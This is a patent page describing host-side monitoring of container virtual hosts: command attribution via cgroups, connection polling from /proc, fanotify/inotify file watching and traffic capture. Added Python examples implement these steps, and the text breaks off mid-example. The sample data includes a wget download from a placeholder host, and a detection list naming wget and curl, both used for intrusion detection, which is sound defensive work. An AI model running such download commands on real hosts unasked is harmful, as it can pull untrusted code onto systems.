CN114978963B - Network system monitoring analysis method and device, electronic equipment and storage medium - Google Patents


Info

Publication number: CN114978963B
Application number: CN202210445794.7A
Authority: CN (China)
Other languages: Chinese (zh)
Other versions: CN114978963A
Prior art keywords: file, host, event, virtual, network connection
Legal status: Active
Inventors: 陶敬, 付鹏, 韩婷, 李峰远, 陈凯梁, 阿晨, 曹垦, 熊宇恒
Current assignee: Xian Jiaotong University
Original assignee: Xian Jiaotong University
Application filed by: Xian Jiaotong University

Classifications

    • H04L43/10 Active monitoring, e.g. heartbeat, ping or trace-route (under H04L43/00 Arrangements for monitoring or testing data switching networks)
    • H04L43/50 Testing arrangements
    • H04L41/14 Network analysis or design (under H04L41/00 Arrangements for maintenance, administration or management of data switching networks)
    • H04L49/70 Virtual switches (under H04L49/00 Packet switching elements)
    • H04L67/1095 Replication or mirroring of data, e.g. scheduling or transport for data synchronisation between network nodes (under H04L67/10 Protocols in which an application is distributed across nodes in the network)
    • G06F9/45533 Hypervisors; Virtual machine monitors (under G06F9/455 Emulation; Interpretation; Software simulation)
    • G06F9/45558 Hypervisor-specific management and integration aspects
    • G06F2009/45587 Isolation or security of virtual machine instances
    • G06F2009/45591 Monitoring or debugging support


Abstract

The embodiments of this application provide a network system monitoring and analysis method and device, an electronic device and a storage medium, and belong to the field of computer technology. The method is applied to a plurality of containerized virtual hosts installed on a host machine, and comprises: acquiring, on the host machine and from outside the virtual hosts, related information about the virtual hosts, the related information comprising network connection information, file events, user behaviour, traffic and backup files; and monitoring the virtual hosts based on the related information and analysing the events occurring in them. The application aims to monitor and analyse a virtual host from outside the virtual host.

Description

Network system monitoring analysis method and device, electronic equipment and storage medium
Technical Field
The embodiments of the present application relate to the field of computer technology, in particular to a network system monitoring and analysis method and device, an electronic device and a storage medium.
Background
Virtual hosts are a number of independent hosts running on the same hardware and the same operating system, each with its own share of system resources (IP address, file storage space, memory, CPU and so on); the virtual hosts are completely independent of each other, and from the outside each one looks exactly like a stand-alone host; such virtualized logical hosts are therefore called "virtual hosts". The host machine is the physical host that provides the running environment and other support for the virtual hosts.
Lightweight virtual hosts, typified by containers, have also emerged. Unlike virtual machines, containers share the host machine's kernel; a container is built on kernel isolation mechanisms such as namespaces and cgroups, which alter the process's view of the system so that, from the inside, the container appears to be an independent environment. The resources inside the container, such as its files, user behaviour and network connections, have corresponding mappings on the host machine and can be captured directly from the host machine.
When a containerized virtual host is in operation it needs to be monitored and analysed to guard against external intrusion. Traditional virtual host monitoring and analysis is usually implemented by installing probes or agents inside the virtual hosts; this requires an installation in every virtual host, which makes deployment cumbersome, and it also carries a security risk: the processes or files belonging to the probe or agent may be discovered and deleted by a hacker, which defeats the monitoring and analysis of the virtual host.
Disclosure of Invention
The embodiments of the present application provide a network system monitoring and analysis method and device, an electronic device and a storage medium, which aim to monitor and analyse a virtual host from outside the virtual host.
In a first aspect, an embodiment of the present application provides a network system monitoring and analysis method, where the method is applied to a plurality of containerized virtual hosts installed on a host machine, and the method includes:
acquiring, on the host machine and from outside the plurality of virtual hosts, related information about the plurality of virtual hosts, the related information comprising network connection information, file events, user behaviour, traffic and backup files;
and monitoring the plurality of virtual hosts based on the related information, and analysing the events occurring in them.
Optionally, acquiring the related information about the plurality of virtual hosts from outside the virtual hosts on the host machine includes:
capturing all user behaviour on the host machine that relates to the plurality of virtual hosts;
polling the host machine for network connection information relating to the plurality of virtual hosts;
and capturing the file events that occur under the image read-write layer directories on the host machine and relate to the plurality of virtual hosts.
Optionally, capturing all user behaviour on the host machine that relates to the plurality of virtual hosts includes:
starting a user behaviour monitoring program to monitor all user operations on the host machine;
acquiring the output of the user behaviour monitoring program, parsing it, and obtaining operation command records;
acquiring the parent process number in each operation command record and, based on it, acquiring the control group (cgroup) information of every process on the host machine associated with the operation command records;
and, based on the control group information, mapping each operation command record one-to-one to the corresponding virtual host and recording it.
Optionally, polling the host machine for network connection information relating to the plurality of virtual hosts includes:
creating a network connection record table for recording the network connection information on the host machine that relates to the plurality of virtual hosts;
acquiring the process numbers of the processes on the host machine that relate to the plurality of virtual hosts;
periodically acquiring, based on those process numbers, the network connection information associated with each process;
determining whether the network connection information already exists in the network connection record table;
if so, updating the start time and end time of that network connection information in the table;
if not, adding the network connection information to the table;
parsing each item of network connection information in the table to obtain the corresponding virtual host connection information, which comprises the virtual host IP, start time, end time, local IP address, local port, external IP, external port, user name, process executable file name and process number;
and enriching the network connection information of the plurality of virtual hosts in the table with the virtual host connection information.
Optionally, capturing the file events that occur under the image read-write layer directories on the host machine and relate to the plurality of virtual hosts includes:
creating a file event monitoring directory (the set of directories to be watched), traversing the image layer directories on the host machine and adding them to the file event monitoring directory;
starting a file monitoring program to monitor the file events generated by all files under the file event monitoring directory, where the file event types comprise access, open, close, attribute modification, creation, deletion and move events;
parsing each acquired file event to obtain the file path of the file in the event;
determining the type of the file event;
if the type is an access, open, close or attribute modification event, storing the file event and the file path;
if the type is a creation, deletion or move event, updating the file event monitoring directory based on the event, and storing the file event and the file path;
and mapping the image layer directory names appearing in the file paths one-to-one to the plurality of virtual hosts.
Optionally, obtaining the backup files of the plurality of virtual hosts includes:
copying the files of the plurality of virtual hosts from the image read-write layer directories on the host machine that relate to those virtual hosts, to obtain the backup files.
Optionally, analysing, based on the backup files, an event occurring in a virtual host includes:
acquiring the operation commands of the plurality of virtual hosts;
detecting file download events and file modification events in the host system based on the operation commands;
when a file download event occurs, acquiring and storing the download link in the event;
when a file modification event occurs, backing up the modified file and acquiring the file path information of the modified file;
and analysing the event occurring in the virtual host based on the download link and the file path information.
In a second aspect, an embodiment of the present application provides a network system monitoring and analysis device, where the device includes an information acquisition module and an analysis module;
the information acquisition module is used for acquiring, on the host machine and from outside the plurality of virtual hosts, related information about them, the related information comprising network connection information, file events, user behaviour, traffic and backup files;
and the analysis module is used for monitoring the plurality of virtual hosts based on the related information and analysing the events occurring in them.
In a third aspect, an embodiment of the present application provides an electronic device including a memory, a processor, and a computer program stored in the memory and executable on the processor, where the processor implements the network system monitoring and analysis method of any one of the first aspects when executing the computer program.
In a fourth aspect, an embodiment of the present application provides a computer readable storage medium storing a computer program which, when executed by a processor, implements the network system monitoring and analysis method of any one of the first aspects.
Beneficial effects: a plurality of virtual hosts are installed on a host machine, the information relating to each virtual host is located from the host machine, and monitoring and analysis are carried out from outside the virtual host. Specifically, the network connection information, file events, user behaviour, traffic and backup files relating to the plurality of virtual hosts are acquired on the host machine from outside the virtual hosts; through this information the virtual hosts on the host machine can be monitored and analysed, and the whole monitoring and analysis process runs on the host machine without intervening inside the virtual host; the effect of continuously monitoring a virtual host from outside and analysing the various events occurring inside it is achieved.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the description of the embodiments of the present application will be briefly described below, it being obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
FIG. 1 is a flow chart of the steps of a method according to an embodiment of the present application;
FIG. 2 is a block diagram illustrating steps for file backup and analysis according to an embodiment of the present application;
FIG. 3 is a functional block diagram of a monitoring and analysis apparatus according to another embodiment of the present application.
Detailed Description
The following description of the embodiments of the present application will be made clearly and fully with reference to the accompanying drawings, in which it is evident that the embodiments described are some, but not all embodiments of the application. All other embodiments, which can be made by those skilled in the art based on the embodiments of the application without making any inventive effort, are intended to be within the scope of the application.
Example 1
Referring to FIG. 1, a flowchart of the steps of a network system monitoring and analysis method in an embodiment of the present invention, the method is applied to a plurality of containerized virtual hosts installed on a host machine, and as shown in FIG. 1 may specifically include the following steps:
S101, acquiring, on the host machine and from outside the plurality of virtual hosts, related information about them, the related information comprising network connection information, file events, user behaviour, traffic and backup files;
The user behaviour is acquired mainly to monitor, from outside the virtual host, whether a hacker has intruded into it; user behaviour here mainly refers to the operation commands executed on the host machine, and if an abnormal operation command is found among the captured user behaviour, it can be judged whether an intrusion has occurred.
When an abnormal intrusion occurs in a virtual host, it can be analysed in detail through the network connection information: by judging which item of network connection information is problematic, the specific process involved in the intrusion and the intruded virtual host can be located.
In an intrusion event the hacker most often modifies, creates and deletes files; by monitoring the read-write layer directories on the host machine, the file modifications, creations and deletions occurring in the virtual hosts can be observed, so that damage at the file level can be guarded against.
The number of accesses to a virtual host, the access times and the accessing processes can be counted from the captured traffic, and if abnormal access occurs it can be analysed through the captured traffic.
S102, monitoring the plurality of virtual hosts based on the related information, and analysing the events occurring in them;
The virtual hosts installed on the host machine can be monitored comprehensively through user behaviour, network connection information, file events and traffic. This information is acquired through the host machine, so no agent or probe needs to be deployed inside the virtual host; the whole monitoring and analysis process runs outside the virtual host, and the virtual hosts can be monitored comprehensively without the hacker noticing.
After a malicious intrusion event, the maintenance staff of the virtual host can analyse it through the backup files: if files in the virtual host have been maliciously deleted or altered, the changed files can be found by comparing the backup files with the deleted and modified files, so that the events that occurred in the virtual host can be analysed.
In this embodiment, a plurality of virtual hosts are installed on a host machine, the method locates the information relating to each virtual host from the host machine, outside the virtual host, and carries out monitoring and analysis. Specifically, the network connection information, file events, user behaviour, traffic and backup files relating to the plurality of virtual hosts are acquired on the host machine from outside the virtual hosts; through this information the virtual hosts on the host machine can be monitored and analysed, and the whole monitoring and analysis process runs on the host machine without intervening inside the virtual host; the effect of continuously monitoring a virtual host from outside and analysing the various events occurring inside it is achieved.
Example 2
Referring to FIG. 1, a flowchart of the steps of a network system monitoring and analysis method according to an embodiment of the present application, the method is applied to a plurality of containerized virtual hosts and, as shown in FIG. 1, may specifically include the following steps:
S101, acquiring, on the host machine and from outside the plurality of virtual hosts, related information about them, the related information comprising network connection information, file events, user behaviour, traffic and backup files; this comprises the following steps:
capturing all user behaviour on the host machine that relates to the plurality of virtual hosts;
polling the host machine for network connection information relating to the plurality of virtual hosts;
and capturing the file events that occur under the image read-write layer directories on the host machine and relate to the plurality of virtual hosts.
Capturing all user behaviour on the host machine that relates to the plurality of virtual hosts comprises:
starting a user behaviour monitoring program to monitor all user operations on the host machine;
The user behaviour monitoring program is a tool for system monitoring, analysis and troubleshooting. It registers system call hooks in a kernel driver module, so that when a system call is entered and completed the program copies the system call information into a dedicated buffer; a user-space component then processes (decompresses, parses, filters, etc.) the collected data, and finally the results are presented to the user through the program's command line.
Once the user behaviour monitoring program is running, when a hacker intrudes into a virtual host and executes operation commands, the program can capture and output the operation command records of those user operations.
acquiring the output of the user behaviour monitoring program, parsing it, and obtaining the operation command records;
acquiring the parent process number in each operation command record and, based on it, acquiring the control group information of every process on the host machine associated with the operation command records;
Since the user behaviour monitoring program monitors the host machine and carries no information about the virtual hosts, it cannot know in which virtual host the current operation command occurred; therefore, using the parent process number it reports, the control group information of the relevant process must be obtained from that parent process's /proc/<ppid>/cgroup file.
and, based on the control group information, mapping each operation command record one-to-one to the corresponding virtual host and recording it.
After the control group information of the process relevant to each operation command record has been obtained from /proc/<ppid>/cgroup, the record is associated with the corresponding virtual host according to that information, and the virtual host name and the operation command record are written into the database.
In this embodiment, the database is created to record the monitoring information obtained by the method; it may be located on the host machine or on a cloud server. All monitoring information obtained by the method is recorded in the database, so that when analysis is needed later, staff can retrieve all the relevant monitoring information directly from it.
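As an added example (not part of the patent text or the applicant's implementation), the following Python script shows how the user behaviour steps above, together with the download and file-modification detection described in the Disclosure, can be carried out offline: it extracts the container ID from the contents of /proc/<ppid>/cgroup, maps it to a virtual host name, and classifies each operation command record. The cgroup path layouts (the usual Docker "/docker/<id>" for cgroup v1 and "docker-<id>.scope" for cgroup v2), the command records, the container-ID-to-name map and the sets of programs treated as downloaders and editors are all assumptions of the example.

```python
"""Added example (not the patent's code): attribute host-captured operation
command records to the containerized virtual host they ran in via the parent
process's cgroup membership, and flag download / file-modification commands.
The cgroup file contents, command records and container-ID-to-name map below
are constructed sample data; the cgroup path layouts are assumed to be the
usual Docker ones ("/docker/<id>" for cgroup v1, "docker-<id>.scope" for v2).
"""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

# 64-hex container ID in either cgroup v1 or cgroup v2 path layout (assumed layouts).
_CGROUP_ID_RE = re.compile(r"(?:/docker/|docker-)([0-9a-f]{64})")
_URL_RE = re.compile(r"https?://\S+")
_DOWNLOADERS = {"wget", "curl"}                  # treated as file-download events (assumption)
_EDITORS = {"vi", "vim", "nano", "sed", "tee"}   # treated as file-modification events (assumption)


def read_cgroup(ppid: int) -> str:
    """Read /proc/<ppid>/cgroup on a live Linux host (not used by the offline sample)."""
    with open(f"/proc/{ppid}/cgroup") as f:
        return f.read()


def container_id_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the container ID named in a /proc/<pid>/cgroup file, or None for host processes."""
    for line in cgroup_text.splitlines():
        m = _CGROUP_ID_RE.search(line)
        if m:
            return m.group(1)
    return None


@dataclass
class CommandRecord:
    ts: str        # timestamp as reported by the monitoring program
    ppid: int      # parent process number reported with the command
    user: str
    command: str


def classify_command(command: str):
    """Tag a command as ("download", link), ("modify", path) or ("other", None)."""
    try:
        argv = shlex.split(command)
    except ValueError:                 # unbalanced quotes: fall back to a plain split
        argv = command.split()
    if not argv:
        return ("other", None)
    prog = argv[0].rsplit("/", 1)[-1]  # strip any directory prefix from the program name
    if prog in _DOWNLOADERS:
        m = _URL_RE.search(command)
        return ("download", m.group(0) if m else None)
    if prog in _EDITORS:
        paths = [a for a in argv[1:] if a.startswith("/")]
        return ("modify", paths[0] if paths else None)
    return ("other", None)


def correlate(records, cgroup_files, names):
    """Attach each record to its virtual host and classify it.

    cgroup_files maps ppid -> contents of /proc/<ppid>/cgroup (passed in as a
    dict so the example runs offline); names maps container ID -> virtual host name.
    """
    rows = []
    for r in records:
        cid = container_id_from_cgroup(cgroup_files.get(r.ppid, ""))
        vhost = names.get(cid, "unknown-container") if cid else "host"
        kind, detail = classify_command(r.command)
        rows.append({"ts": r.ts, "vhost": vhost, "user": r.user,
                     "command": r.command, "kind": kind, "detail": detail})
    return rows


# --- constructed sample data ---------------------------------------------
CID_A = "a" * 64
CID_B = "b" * 64
SAMPLE_CGROUPS = {
    4242: "12:memory:/docker/" + CID_A + "\n1:name=systemd:/docker/" + CID_A + "\n",
    5151: "0::/system.slice/docker-" + CID_B + ".scope\n",
    777: "0::/user.slice/user-1000.slice/session-3.scope\n",   # a plain host shell
}
SAMPLE_NAMES = {CID_A: "vhost-web", CID_B: "vhost-db"}
SAMPLE_RECORDS = [
    CommandRecord("2022-04-26T10:00:01", 4242, "root",
                  "wget http://example.invalid/tool.tar.gz -O /tmp/tool.tar.gz"),
    CommandRecord("2022-04-26T10:00:05", 5151, "root",
                  "sed -i 's/Listen 80/Listen 8080/' /etc/nginx/nginx.conf"),
    CommandRecord("2022-04-26T10:00:09", 777, "ops", "ls -la /var/log"),
]

if __name__ == "__main__":
    for row in correlate(SAMPLE_RECORDS, SAMPLE_CGROUPS, SAMPLE_NAMES):
        print(row)
```

On a live host the cgroup text would come from read_cgroup(record.ppid) instead of the constructed dictionary, and the container-ID-to-name map from the container runtime; the classification lists are deliberately small and would be tuned to the hosts being monitored.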
Polling the host machine for network connection information relating to the plurality of virtual hosts comprises:
creating a network connection record table for recording the network connection information on the host machine that relates to the plurality of virtual hosts;
When monitoring and analysing the network connections of the virtual hosts, staff can obtain all the information they need directly from the network connection record table.
acquiring the process numbers of the processes on the host machine that relate to the plurality of virtual hosts;
periodically acquiring, based on those process numbers, the network connection information associated with each process;
When acquiring network connection information on the host machine, the process numbers of all virtual host processes are obtained first; then the /proc/<pid>/net/tcp file corresponding to each process number is read from the host machine once per second and parsed to obtain the current network connection information of the host machine.
determining whether the network connection information already exists in the network connection record table;
if so, updating the start time and end time of that network connection information in the table;
if not, adding the network connection information to the table;
parsing each item of network connection information in the table to obtain the corresponding virtual host connection information, which comprises the virtual host IP, start time, end time, local IP address, local port, external IP, external port, user name, process executable file name and process number.
and enriching the network connection information of the plurality of virtual hosts in the table with the virtual host connection information.
When the acquired network connection information is written into the network connection record table: if an item of network connection information is read from /proc/<pid>/net/tcp but is not present in the table, it represents a connection seen for the first time; the item must be recorded in the table, with the current time taken as the connection start time and written into the table.
If an item of network connection information is present in the table but is no longer read from /proc/<pid>/net/tcp, the corresponding connection has been closed and the item must be recorded in the database: the current time is taken as the connection end time, the current time together with the item's information from the table is written into the database, and the item is deleted from the table.
If an item is read from /proc/<pid>/net/tcp and is also present in the table, the connection has persisted and no action is needed.
When network connection information is recorded in the table, because the data collected from /proc/<pid>/net/tcp carries little information, the corresponding executable file, user and other details are looked up from the inode, uid and similar fields of the /proc/<pid>/net/tcp entry; the original network connection information is enriched with them and written into the network connection record table.
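The polling procedure described in the first aspect and in the steps above, as an added example in Python that is not part of the patent or the applicant's code: it parses the text of /proc/<pid>/net/tcp (decoding the host-byte-order hexadecimal addresses), keeps the network connection record table, gives a newly seen connection a start time, gives a vanished connection an end time and flushes it to the database, and enriches entries with user name and executable via the uid and inode fields. The snapshots, the process-to-virtual-host map, the uid and inode lookup tables, the "database" (a plain list) and the filtering out of LISTEN sockets are all constructed or assumed by the example.

```python
"""Added example (not the patent's code): parse /proc/<pid>/net/tcp as read
from the host and maintain the network connection record table described in
the text. Sample snapshots, the pid-to-virtual-host map, the uid/inode lookup
tables and the "database" (a plain list) are constructed.
"""
import ipaddress
import struct

TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
              "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
              "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING"}


def decode_addr(field: str):
    """'0100007F:0016' -> ('127.0.0.1', 22); IPv4 is stored as host-byte-order hex (little-endian on x86)."""
    addr_hex, port_hex = field.split(":")
    addr = struct.unpack("<I", bytes.fromhex(addr_hex))[0]
    return str(ipaddress.IPv4Address(addr)), int(port_hex, 16)


def parse_proc_net_tcp(text: str):
    """Yield one dict per socket line of a /proc/<pid>/net/tcp file (header line skipped)."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 10 or not parts[0].endswith(":") or not parts[0][:-1].isdigit():
            continue
        local, lport = decode_addr(parts[1])
        remote, rport = decode_addr(parts[2])
        yield {"local": local, "lport": lport, "remote": remote, "rport": rport,
               "state": TCP_STATES.get(parts[3], parts[3]),
               "uid": int(parts[7]), "inode": int(parts[9])}


class ConnectionTable:
    """The network connection record table plus the database closed entries are flushed to."""

    def __init__(self):
        self.active = {}      # key -> record for connections currently present
        self.database = []    # closed records carrying both start and end time

    def poll(self, now, snapshots, pid_to_vhost, uid_to_user, inode_to_exe):
        """One polling round; snapshots maps pid -> text of /proc/<pid>/net/tcp."""
        seen = set()
        for pid, text in snapshots.items():
            for c in parse_proc_net_tcp(text):
                if c["state"] == "LISTEN":   # listening sockets are not connections (assumed filter)
                    continue
                key = (pid_to_vhost.get(pid, "host"), c["local"], c["lport"], c["remote"], c["rport"])
                seen.add(key)
                if key not in self.active:   # seen for the first time: record with start time
                    self.active[key] = {
                        "vhost": key[0], "start": now, "end": None,
                        "local_ip": c["local"], "local_port": c["lport"],
                        "external_ip": c["remote"], "external_port": c["rport"],
                        "user": uid_to_user.get(c["uid"], str(c["uid"])),
                        "exe": inode_to_exe.get(c["inode"], "unknown"), "pid": pid}
        closed = []
        for key in list(self.active):        # in the table but gone from /proc: connection closed
            if key not in seen:
                rec = self.active.pop(key)
                rec["end"] = now
                self.database.append(rec)
                closed.append(rec)
        return closed


# --- constructed sample data ---------------------------------------------
HEADER = "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
LISTEN_LINE = ("   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000"
               "     0        0 90001 1 0000000000000000 100 0 0 10 0\n")
# 172.17.0.2:80 <- 203.0.113.5:51514, ESTABLISHED, uid 0, inode 98765
ESTAB_LINE = ("   1: 020011AC:0050 057100CB:C93A 01 00000000:00000000 00:00000000 00000000"
              "     0        0 98765 1 0000000000000000 20 4 30 10 -1\n")
SNAPSHOT_T1 = {4242: HEADER + LISTEN_LINE + ESTAB_LINE}
SNAPSHOT_T2 = {4242: HEADER + LISTEN_LINE}      # the connection has gone away
PID_TO_VHOST = {4242: "vhost-web"}
UID_TO_USER = {0: "root"}
INODE_TO_EXE = {98765: "nginx"}   # on a live host: resolve socket:[inode] in /proc/<pid>/fd, then /proc/<pid>/exe


def run_sample():
    """Two polling rounds over the constructed snapshots; returns the table for inspection."""
    table = ConnectionTable()
    table.poll(1000, SNAPSHOT_T1, PID_TO_VHOST, UID_TO_USER, INODE_TO_EXE)
    table.poll(1001, SNAPSHOT_T2, PID_TO_VHOST, UID_TO_USER, INODE_TO_EXE)
    return table


if __name__ == "__main__":
    for rec in run_sample().database:
        print(rec)
```

Because the key includes the virtual host, the same local/external pair seen from two containers is kept as two records, which is what makes the table attributable per virtual host.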
The capturing the file event occurring under the mirror image readable and writable layer file directory on the host machine related to the plurality of virtual machines includes:
creating a file event monitoring directory, traversing a mirror layer directory on the host machine, and adding the mirror layer directory into the file event monitoring directory;
Starting a file monitoring program to monitor file events generated by all files in the file event monitoring catalog, wherein the types of the file events comprise access events, opening events, closing events, attribute modification events, creation events, deletion events and movement events;
In this embodiment, fanotify and inotify used by the file monitor are a file monitoring technology on the Linux platform, and through fanotify and inotify, file events occurring under the mirror layer directories related to the multiple virtual hosts on the host can be monitored.
After fanotify is started, all directories under the file event monitoring directory are traversed through a depth-first algorithm, a PATH array is created, and then the monitored file PATHs are stored in the PATH array. Initializing fanotify and inotify to obtain descriptors fa_fd and i_fd of the file event queue; by reading the descriptor, a file event is obtained. After traversing the PATH array, adding the file directory into the file event monitoring directory. And initializing poll, polling the event of fa_fd and command line input, and acquiring file event occurring on host.
parsing the obtained file event to obtain the file path of the file in the file event;
judging the type of the file event;
When judging, the fanotify event handler is entered directly, and for access, open, close, attribute-modification and execution events of files/directories a log record is written at once. For creation, deletion and movement of files/directories, i_fd is first read by the inotify handler to obtain the specific name of the affected file/directory, which is stored in the corresponding PATH array; the corresponding fanotify and inotify watch objects are then added or removed respectively, and finally control returns to the fanotify handler for log output.
if the type of the file event is an access, open, close or attribute-modification event, storing the file event and the file path;
if the type of the file event is a create, delete or move event, updating the file event monitoring directory based on the file event, and storing the file event and the file path;
and attributing the file event to a virtual host according to the image layer directory name in the file path, the image layer directory names being in one-to-one correspondence with the multiple virtual hosts.
When the file event type is access, open, close or attribute modification, the intrusion only browses files in the virtual host and does not change which files exist there, so saving the file path is sufficient, and the malicious file event in the virtual host can be identified from that path. When the file event type is create, delete or move, the files in the virtual host have changed (files may have been added or removed), so the file event monitoring directory must be updated, the added or removed file must be taken into the monitoring target, and the file event and file path are saved so that the malicious file event can be traced from them.
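The procedure above, and the identical steps recited in claim 5, can be implemented from the host with the two kernel interfaces the embodiment names. The following Python module is an added example written for this page, not code from the patent; it reaches fanotify and inotify through ctypes. It assumes a Docker overlay2 layout in which each container's read-write layer is a directory such as /var/lib/docker/overlay2/<layer-id>/diff (the mapping from layer directory to container is passed in, for instance from docker inspect's GraphDriver.Data.UpperDir), and the sample buffers and layer map it carries are constructed. Attribute-modification events are taken from inotify's IN_ATTRIB rather than fanotify's FAN_ATTRIB, because the latter requires the file-handle (FAN_REPORT_FID) mode of fanotify, which reports no open fd from which a path could be resolved.

```python
"""Added example: host-side file-event sensor for container read-write layers.
fanotify supplies access/open/modify/close with an open fd (path via /proc/self/fd);
inotify supplies attrib/create/delete/move by name, and a newly created directory
is added to both watch sets.  Syscalls are reached through ctypes; needs root."""
import ctypes
import os
import select
import struct

AT_FDCWD = -100                         # dirfd value meaning "pathname is absolute / relative to cwd"
# <linux/fanotify.h>
FAN_ACCESS, FAN_MODIFY, FAN_CLOSE_WRITE, FAN_CLOSE_NOWRITE, FAN_OPEN = 0x01, 0x02, 0x08, 0x10, 0x20
FAN_EVENT_ON_CHILD, FAN_CLOEXEC, FAN_NONBLOCK, FAN_CLASS_NOTIF, FAN_MARK_ADD = 0x08000000, 1, 2, 0, 1
FAN_META = struct.Struct("=IBBHQii")    # event_len, vers, reserved, metadata_len, mask, fd, pid (24 bytes)
# <sys/inotify.h>
IN_ATTRIB, IN_MOVED_FROM, IN_MOVED_TO, IN_CREATE, IN_DELETE, IN_ISDIR = 0x04, 0x40, 0x80, 0x100, 0x200, 0x40000000
IN_HDR = struct.Struct("=iIII")         # wd, mask, cookie, len; followed by len bytes of NUL-padded name
FAN_KINDS = ((FAN_ACCESS, "access"), (FAN_OPEN, "open"), (FAN_MODIFY, "modify"),
             (FAN_CLOSE_WRITE | FAN_CLOSE_NOWRITE, "close"))
IN_KINDS = ((IN_ATTRIB, "attrib"), (IN_CREATE, "create"), (IN_DELETE, "delete"),
            (IN_MOVED_FROM | IN_MOVED_TO, "move"))
# Constructed samples (what read() would return) so the parsers can be exercised without root.
SAMPLE_FAN_BUF = FAN_META.pack(24, 3, 0, 24, FAN_OPEN, 7, 1234) + FAN_META.pack(24, 3, 0, 24, FAN_MODIFY | FAN_CLOSE_WRITE, 8, 1234)
SAMPLE_IN_BUF = IN_HDR.pack(1, IN_CREATE | IN_ISDIR, 0, 16) + b"dropper".ljust(16, b"\0")
SAMPLE_LAYERS = {"/var/lib/docker/overlay2/0a1b2c/diff": "web"}   # hypothetical upper dir -> container name

def parse_fanotify_events(buf):
    """Split one read() from the fanotify fd into (mask, fd, pid) tuples."""
    out, off = [], 0
    while off + FAN_META.size <= len(buf):
        event_len, _vers, _res, _mlen, mask, fd, pid = FAN_META.unpack_from(buf, off)
        out.append((mask, fd, pid))
        off += event_len or FAN_META.size
    return out

def parse_inotify_events(buf):
    """Split one read() from the inotify fd into (wd, mask, name) tuples."""
    out, off = [], 0
    while off + IN_HDR.size <= len(buf):
        wd, mask, _cookie, nlen = IN_HDR.unpack_from(buf, off)
        off += IN_HDR.size
        out.append((wd, mask, buf[off:off + nlen].split(b"\0", 1)[0].decode(errors="replace")))
        off += nlen
    return out

def classify(mask, kinds):
    """Event bitmask -> the event-type names used in the description."""
    return [name for bits, name in kinds if mask & bits]

def container_for_path(path, layer_dirs):
    """Host path under a container's layer -> (container, path as the container sees it)."""
    for layer, cid in layer_dirs.items():
        layer = layer.rstrip("/")
        if path == layer or path.startswith(layer + "/"):
            rel = os.path.relpath(path, layer)
            return cid, "/" if rel == "." else "/" + rel
    return None, path                   # outside every monitored layer

class LayerMonitor:
    def __init__(self, layer_dirs):
        self.layer_dirs, self.wd_path = layer_dirs, {}
        self.libc = ctypes.CDLL(None, use_errno=True)
        self.libc.fanotify_mark.argtypes = [ctypes.c_int, ctypes.c_uint, ctypes.c_uint64, ctypes.c_int, ctypes.c_char_p]
        self.fa_fd = self.libc.fanotify_init(FAN_CLOEXEC | FAN_NONBLOCK | FAN_CLASS_NOTIF, os.O_RDONLY)
        self.i_fd = self.libc.inotify_init1(os.O_NONBLOCK | os.O_CLOEXEC)
        if self.fa_fd < 0 or self.i_fd < 0:
            raise OSError(ctypes.get_errno(), "fanotify/inotify init failed (root required)")
        for layer in layer_dirs:
            for root, _dirs, _files in os.walk(layer):   # depth-first walk builds the PATH set
                self.watch(root)

    def watch(self, directory):
        mask = FAN_ACCESS | FAN_MODIFY | FAN_OPEN | FAN_CLOSE_WRITE | FAN_CLOSE_NOWRITE | FAN_EVENT_ON_CHILD
        self.libc.fanotify_mark(self.fa_fd, FAN_MARK_ADD, mask, AT_FDCWD, directory.encode())
        wd = self.libc.inotify_add_watch(self.i_fd, directory.encode(),
                                         IN_ATTRIB | IN_CREATE | IN_DELETE | IN_MOVED_FROM | IN_MOVED_TO)
        self.wd_path[wd] = directory

    def events(self):
        """Yield (container, path_in_container, kind, pid_or_None) as events arrive."""
        poller = select.poll()
        poller.register(self.fa_fd, select.POLLIN)
        poller.register(self.i_fd, select.POLLIN)
        while True:
            for fd, _ in poller.poll():
                if fd == self.fa_fd:
                    for mask, efd, pid in parse_fanotify_events(os.read(fd, 8192)):
                        path = os.readlink(f"/proc/self/fd/{efd}")
                        os.close(efd)                    # fanotify hands out a real fd: release it
                        cid, rel = container_for_path(path, self.layer_dirs)
                        for kind in classify(mask, FAN_KINDS):
                            yield cid, rel, kind, pid
                else:
                    for wd, mask, name in parse_inotify_events(os.read(fd, 8192)):
                        path = os.path.join(self.wd_path.get(wd, ""), name)
                        if mask & IN_CREATE and mask & IN_ISDIR:
                            self.watch(path)             # new directory: extend the monitored set
                        cid, rel = container_for_path(path, self.layer_dirs)
                        for kind in classify(mask, IN_KINDS):
                            yield cid, rel, kind, None

if __name__ == "__main__":              # usage (root): layer_monitor.py web=/var/lib/docker/overlay2/<layer>/diff
    import sys
    layers = {path: name for name, path in (arg.split("=", 1) for arg in sys.argv[1:])}
    for cid, path, kind, pid in LayerMonitor(layers).events():
        print(cid, kind, path, pid)
```

Two limits a deployment has to plan for: inotify needs one watch per directory, so fs.inotify.max_user_watches bounds how much of a layer can be covered; and a file that exists only in a lower (image) layer is not touched in the read-write directory until it is copied up on first write, so read-only access to unmodified image files is only observed if the lower-layer directories are marked as well, which is what the description's traversal of all image layer directories provides.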
The method further comprises capturing all traffic of the host machine:
acquiring the traffic of the host machine;
obtaining the five-tuple information of the traffic, the five-tuple comprising the source IP address, source port, destination address, destination port and transport-layer protocol;
dividing the traffic according to the IP address in the five-tuple, and storing each part as a file in network packet capture (pcap) format.
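As an added example (not code from the patent), the following Python script performs the three steps just listed on a saved capture: it parses the classic pcap format, extracts the five-tuple from every Ethernet/IPv4 TCP or UDP frame, and writes one pcap per virtual-host IP address. The capture is assumed to be taken on the host's container bridge (for example tcpdump -i docker0 -w host.pcap; the interface name is an assumption), the virtual-host addresses are supplied by the caller, and the sample capture embedded in the script is constructed.

```python
"""Added example: split host-captured traffic into per-virtual-host pcap files by the
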